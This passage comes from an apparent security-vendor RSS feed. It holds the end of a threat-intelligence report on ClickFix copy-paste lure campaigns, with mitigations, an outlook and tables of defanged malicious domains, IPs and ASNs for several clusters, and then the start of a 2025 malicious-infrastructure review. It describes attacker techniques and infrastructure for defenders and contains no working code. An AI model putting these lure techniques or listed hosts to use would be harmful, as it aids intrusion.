          <li><strong>Restrict Terminal and PowerShell Execution</strong>: Implement PowerShell Constrained Language Mode (CLM) and use AppLocker or Windows Defender Application Control (WDAC) to prevent the execution of unassigned scripts and the misuse of living-off-the-land binaries (LOLBins). On macOS, restrict Terminal and other shell interpreters (for example, <code>zsh</code> and <code>bash</code>) using application control policies enforced via mobile device management (MDM), and leverage System Integrity Protection (SIP) and endpoint security controls to limit unauthorized script execution and abuse of native command-line utilities.</li>
          <li><strong>User Awareness and Training</strong>: Conduct targeted social engineering simulations that specifically educate users on the dangers of "manual verification" prompts that require copying and pasting commands into system utilities.</li>
        </ul>
        <h2>Outlook</h2>
        <p>The identification of five parallel operational clusters targeting diverse sectors, including accounting, travel, real estate, and legal services, indicates that the ClickFix methodology has transitioned from a niche technique to a standardized template within the cybercriminal ecosystem. This standardized "run and repeat" model is facilitating broader adoption by both lower-tier "traffers" and sophisticated advanced persistent threat (APT) groups. Threat actors are able to maintain operational continuity even when individual domains are blocked due to the availability of disposable infrastructure and shared technical templates.</p>
        <p>Insikt Group assesses with high confidence that the ClickFix methodology will very likely remain a heavily used initial access vector throughout 2026. The continued success of ClickFix is driven by its ability to bypass advanced browser-based security controls by shifting the point of exploitation to user-assisted manual actions. As long as native system utilities such as PowerShell and Terminal remain accessible to end-users, ClickFix will continue to offer threat actors a high-return, low-complexity alternative to traditional exploit kits.</p>
        <p>Looking ahead, ClickFix lures will likely become increasingly technically adaptive. Future iterations are expected to incorporate more granular browser fingerprinting to conditionally serve payloads based on a victim's hardware, geographic location, or organizational profile. Furthermore, since threat actors are already purposefully documenting bypass techniques for static analysis engines within their code, Insikt Group anticipates a long-term trend toward more resilient and obfuscated staging environments. This convergence of sophisticated social engineering and LotL techniques necessitates a shift in defensive strategy, moving away from simple indicator blocking toward aggressive behavioral hardening of the system utilities that ClickFix relies upon.</p>
        <h2>Appendix A: Indicators of Compromise</h2>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18ce7edd37f19ffb5fc8f2ecc71373f3289507995.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="1392" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_16be742309696be96075872e73f72ec87ce30c67a.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="1484" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1904a7c17ae9ec924e23ba147931e923adc8fff00.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="1484" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1bc0ec972fec574cbdd3f4d73c41f7e02345540f5.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="1272" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <h2>Appendix B: Cluster 1 — Intuit QuickBooks Indicators</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN/AS</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>mrinmay[.]net</div>
            <div>193[.]35[.]17[.]12</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-21</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>guypinions[.]com</div>
            <div>193[.]35[.]17[.]12</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-20</div>
            <div>2026-02-25</div>
          </div>
          <div>
            <div>4freepics[.]com</div>
            <div>193[.]35[.]17[.]12</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-20</div>
            <div>2026-02-24</div>
          </div>
          <div>
            <div>ariciversontile[.]com</div>
            <div>193[.]35[.]17[.]12</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-20</div>
            <div>2026-02-25</div>
          </div>
          <div>
            <div>quiptly[.]com</div>
            <div>193[.]35[.]17[.]12</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-20</div>
            <div>2026-02-25</div>
          </div>
          <div>
            <div>anthonydee[.]com</div>
            <div>193[.]35[.]17[.]12</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-20</div>
            <div>2026-02-26</div>
          </div>
          <div>
            <div>ned.coveney-ltd[.]com</div>
            <div>193[.]35[.]17[.]12</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2025-10-10</div>
            <div>2025-11-20</div>
          </div>
          <div>
            <div>grandmastertraders[.]traderslinkfx[.]com</div>
            <div>193[.]35[.]17[.]12</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2025-12-01</div>
            <div>2026-02-24</div>
          </div>
          <div>
            <div>nhacaired88[.]com</div>
            <div>193[.]58[.]122[.]97</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-10</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>elive777a[.]com</div>
            <div>94[.]156[.]112[.]115</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-02</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>fomomforhealth[.]com</div>
            <div>94[.]156[.]112[.]115</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-02</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>suedfactoring[.]it[.]com</div>
            <div>45[.]93[.]20[.]141</div>
            <div>Chang Way Technologies Co. Limited (AS57523)</div>
            <div>2026-01-30</div>
            <div>2026-02-09</div>
          </div>
          <div>
            <div>shopifyservercloud[.]com</div>
            <div>45[.]93[.]20[.]50</div>
            <div>Chang Way Technologies Co. Limited (AS57523)</div>
            <div>2026-01-10</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>elive123go[.]com</div>
            <div>45[.]93[.]20[.]50</div>
            <div>Chang Way Technologies Co. Limited (AS57523)</div>
            <div>2026-01-09</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>hostmaster[.]extracareliving[.]com</div>
            <div>45[.]93[.]20[.]50</div>
            <div>Chang Way Technologies Co. Limited (AS57523)</div>
            <div>2026-01-25</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>orkneygateway[.]com</div>
            <div>45[.]93[.]20[.]50</div>
            <div>Chang Way Technologies Co. Limited (AS57523)</div>
            <div>2025-12-14</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>ustazazharidrus[.]com</div>
            <div>87[.]236[.]16[.]20</div>
            <div>Beget LLC (AS198610)</div>
            <div>2026-02-02</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>45[.]93[.]20[.]50</div>
            <div>Chang Way Technologies Co. Limited (AS57523)</div>
            <div>2026-01-09</div>
            <div>2026-02-01</div>
          </div>
          <div>
            <div>deinhealthcoach[.]com</div>
            <div>193[.]222[.]99[.]212</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>bancatangcode[.]com</div>
            <div>193[.]222[.]99[.]212</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>billiardinstitute[.]com</div>
            <div>193[.]58[.]122[.]97</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-10</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>yvngvualr[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2025-04-06</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>visitbundala[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2025-03-10</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>surecomforts[.]com</div>
            <div>45[.]93[.]20[.]50</div>
            <div>Chang Way Technologies Co. Limited (AS57523)</div>
            <div>2026-01-09</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>theinvestworthy[.]com</div>
            <div>45[.]93[.]20[.]50</div>
            <div>Chang Way Technologies Co. Limited (AS57523)</div>
            <div>2025-12-13</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>customblindinstall[.]com</div>
            <div>193[.]35[.]17[.]12</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-21</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>extracareliving[.]com</div>
            <div>45[.]93[.]20[.]50</div>
            <div>Chang Way Technologies Co. Limited (AS57523)</div>
            <div>2025-12-14</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>subsgod[.]com</div>
            <div>193[.]35[.]17[.]12</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-21</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>traderslinkfx[.]com</div>
            <div>193[.]35[.]17[.]12</div>
            <div>PLAY2GO INTERNATIONAL LIMITED (AS215439)</div>
            <div>2026-02-21</div>
            <div>2026-03-05</div>
          </div>
        </div>
        <h2>Appendix C: bibi.php Script</h2>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_14f678dfcceb86fe66848ade7c543ab0017cbb1c3.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="1390" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_191574e4830e7909e62a79e4d3ff1c612e928c1bc.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="1490" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_123d049fb8874e716baa55e028a0bdc98a5aabbae.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="548" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <h2>Appendix D: Cluster 2 — Booking.com Indicators</h2>
        <div>
          <div>
            <div><strong>Indicator</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>sign-in-op-token[.]com</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-03-01</div>
            <div>2026-03-03</div>
          </div>
          <div>
            <div>thestayreserve[.]com</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-23</div>
            <div>2026-02-24</div>
          </div>
          <div>
            <div>accountpulse[.]help</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>admin-activitycheck[.]com</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-22</div>
            <div>2026-02-27</div>
          </div>
          <div>
            <div>accountmime[.]com</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-21</div>
            <div>2026-02-24</div>
          </div>
          <div>
            <div>checkhelpdesk[.]com</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-18</div>
            <div>2026-02-23</div>
          </div>
          <div>
            <div>thepulseactivity[.]com</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-18</div>
            <div>2026-02-23</div>
          </div>
          <div>
            <div>checkaccountactivity[.]com</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-17</div>
            <div>2026-02-23</div>
          </div>
          <div>
            <div>account-helpdesk[.]top</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-15</div>
            <div>2026-02-18</div>
          </div>
          <div>
            <div>pulse-help-desk[.]com</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-13</div>
            <div>2026-02-19</div>
          </div>
          <div>
            <div>account-helpdesk[.]icu</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-10</div>
            <div>2026-03-02</div>
          </div>
          <div>
            <div>account-helpdesk[.]info</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-08</div>
            <div>2026-02-11</div>
          </div>
          <div>
            <div>helpdeskpulse[.]com</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-06</div>
            <div>2026-02-09</div>
          </div>
          <div>
            <div>account-help[.]info</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-08</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>acconthelpdesk[.]com</div>
            <div>91[.]202[.]233[.]206</div>
            <div>Prospero (AS200593)</div>
            <div>2026-02-05</div>
            <div>2026-03-03</div>
          </div>
        </div>
        <h2>Appendix E: Cluster 3 — Birdeye Indicators</h2>
        <div>
          <div>
            <div><strong>Indicator</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>acebirdrep[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>bebirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrankbox[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrankfx[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrankgo[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrankinc[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrankllc[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrankmax[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdranktip[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrankup[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-17</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrankus[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-17</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrankusa[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2024-05-16</div>
          </div>
          <div>
            <div>birdrankvip[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrankzen[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-17</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrepbiz[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrepgo[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrephelp[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdreplab[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrepsys[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrepusa[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>birdrepuse[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>bitbirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>bitbirdrep[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-17</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>fixbirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-17</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>getbirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>gobirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>helpbirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>helpbirdrep[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>infobirdrep[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>justbirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>mybirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>nowbirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-17</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>optbirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>probirdrep[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>topbirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>topbirdrep[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-17</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>usbirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2024-05-16</div>
          </div>
          <div>
            <div>usebirdrep[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>vipbirdrank[.]com</div>
            <div>Cloudflare</div>
            <div>Cloudflare</div>
            <div>2024-05-16</div>
            <div>2026-03-05</div>
          </div>
        </div>
        <h2>Appendix F: Birdeye Cluster Javascript</h2>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_12fdc05c3f194f5e29fe1c8db7ca9e25f0abf6f79.png?width=750&amp;format=png&amp;optimize=medium" width="1260" height="1360" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13dd203417b2a025c2bd1932c5f7ee8402ef84fa8.png?width=750&amp;format=png&amp;optimize=medium" width="1260" height="1484" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1f84a894f6c81d0e7ebd89e08af321da549187eb1.png?width=750&amp;format=png&amp;optimize=medium" width="1260" height="1484" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1196b63329b8f8e703bf1869ef5ea63b49bffb750.png?width=750&amp;format=png&amp;optimize=medium" width="1268" height="1246" />
            </div>
          </div>
          <div>
            <div></div>
          </div>
        </div>
        <h2>Appendix G: Cluster 4 — Dual-Platform Selection Indicators</h2>
        <div>
          <div>
            <div><strong>Indicator</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>valetfortesla[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-11-12</div>
            <div>2026-03-05</div>
          </div>
          <div>
            <div>macxapp[.]org</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-18</div>
            <div>2025-06-18</div>
          </div>
          <div>
            <div>apposx[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-13</div>
            <div>2025-06-24</div>
          </div>
          <div>
            <div>cryptonews-info[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-18</div>
            <div>2025-12-20</div>
          </div>
          <div>
            <div>macosx-app[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-14</div>
            <div>2025-06-16</div>
          </div>
          <div>
            <div>cryptoinfnews[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-14</div>
            <div>2025-06-30</div>
          </div>
          <div>
            <div>macxapp[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-14</div>
            <div>2025-06-16</div>
          </div>
          <div>
            <div>cryptoinfo-allnews[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-13</div>
            <div>2025-06-30</div>
          </div>
          <div>
            <div>appxmacos[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-13</div>
            <div>2025-06-30</div>
          </div>
          <div>
            <div>appmacintosh[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-12</div>
            <div>2025-06-13</div>
          </div>
          <div>
            <div>macosxappstore[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-09</div>
            <div>2025-06-30</div>
          </div>
          <div>
            <div>macosx-apps[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-09</div>
            <div>2025-06-11</div>
          </div>
          <div>
            <div>cryptoinfo-news[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-06-08</div>
            <div>2025-06-29</div>
          </div>
          <div>
            <div>financementure[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-27</div>
            <div>2025-06-30</div>
          </div>
          <div>
            <div>appsmacosx[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-27</div>
            <div>2025-06-09</div>
          </div>
          <div>
            <div>appmacosx[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-27</div>
            <div>2025-06-14</div>
          </div>
          <div>
            <div>macosxapp[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-27</div>
            <div>2025-06-09</div>
          </div>
          <div>
            <div>macosapp-apple[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-25</div>
            <div>2025-05-26</div>
          </div>
          <div>
            <div>macapps-apple[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-23</div>
            <div>2025-05-24</div>
          </div>
          <div>
            <div>macapp-apple[.]com</div>
            <div>45[.]144[.]233[.]192</div>
            <div>Baykov Ilya Sergeevich<br />(AS41745)</div>
            <div>2025-05-13</div>
            <div>2025-05-23</div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_16fe3d928ba14ff57277e6047a05663f3be02b365.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[2025 Year in Review: Malicious, Infrastructure]]></title>
            <link>https://www.recordedfuture.com/ko/research/2025-year-in-review-malicious-infrastructure</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/2025-year-in-review-malicious-infrastructure</guid>
            <pubDate>Thu, 19 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore Insikt Group’s 2025 Malicious Infrastructure Report. Gain insights into Cobalt Strike, Vidar infostealers, and AI-driven threats to secure your 2026 strategy.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>In 2025, Insikt Group significantly expanded its tracking of malicious infrastructure, broadening<br />coverage across additional malware families and threat categories spanning cybercriminal and APT activity. This expansion included deeper analysis of infrastructure types, enhanced integration of data sources such as Recorded Future Network Intelligence®, improved threat detection methodologies,more granular higher-tier infrastructure insights, expanded victimology analysis, and a new focus on so-called threat activity enablers (TAEs). While many patterns identified in 2024 persisted, including Cobalt Strike’s dominance among offensive security tools (OSTs), AsyncRAT and QuasarRAT leading the remote access trojan (RAT) landscape, the widespread use of open-source or cracked malware variants, and the continued prevalence of Android malware within the mobile threat ecosystem, Insikt Group observed several notable shifts and emerging trends throughout 2025.</p>
        <p>For example, although Cobalt Strike remained the most prominent OST, its relative share of detected command-and-control (C2) servers declined as detection coverage expanded and competing tools gained traction. Tools such as RedGuard, Ligolo, and Supershell saw significant growth in use throughout 2025. Following law enforcement disruption efforts targeting LummaC2, Vidar and other infostealers partially filled the gap, reflecting continued volatility in the infostealer ecosystem. Similar fluctuations were observed in the loader and dropper landscape, where new malware families consistently emerged, including CastleLoader, attributed to GrayBravo. Additionally, Insikt Group observed sustained and widespread use of traffic distribution systems (TDS), including activity by TAG-124, GrayCharlie, and other threat actors.</p>
        <p>Defenders should leverage the insights from this report to strengthen security controls by prioritizing the detection and mitigation of the most prevalent malware families and infrastructure techniques. This includes enhancing network monitoring capabilities and deploying relevant detection mechanisms such as YARA, Sigma, and Snort rules. Organizations should also invest in tracking evolving malicious infrastructure dynamics, conducting threat simulations to validate their defensive posture, and maintaining continuous monitoring of the broader threat landscape. With respect to legitimate infrastructure services (LIS), defenders must carefully balance blocking, flagging, or allowing high-risk services based on assessed criticality and organizational risk tolerance.</p>
        <p>As malicious infrastructure continues to evolve alongside improving detection capabilities, Insikt Group anticipates that many current trends will persist into 2026. Rather than dramatic shifts, change is likely to be driven by incremental innovation, adaptation to defensive measures, and reactions to public reporting and law enforcement actions. Threat actors are expected to continue leveraging legitimate tools, services, and content delivery networks (CDNs) such as Cloudflare, a pattern also heavily observed among multiple APT groups, to blend malicious activity with legitimate traffic. While not yet widely observed at the infrastructure layer, Insikt Group assesses that artificial intelligence may increasingly be leveraged to support evasion and operational resilience. The “as-a-service” ecosystem is likely to continue expanding across malware categories, enabling scalability and lowering barriers to entry for threat actors. Although public reporting and sanctions targeting certain TAEs have triggered increased scrutiny, the ecosystem’s underlying economic and operational logic is expected to remain</p>
        <p>intact, allowing established actors to continue operating. At the same time, Insikt Group anticipates increasingly assertive international law enforcement actions targeting malicious infrastructure, including coordinated takedowns and other disruption efforts.</p>
        <h2>Key Findings</h2>
        <ul>
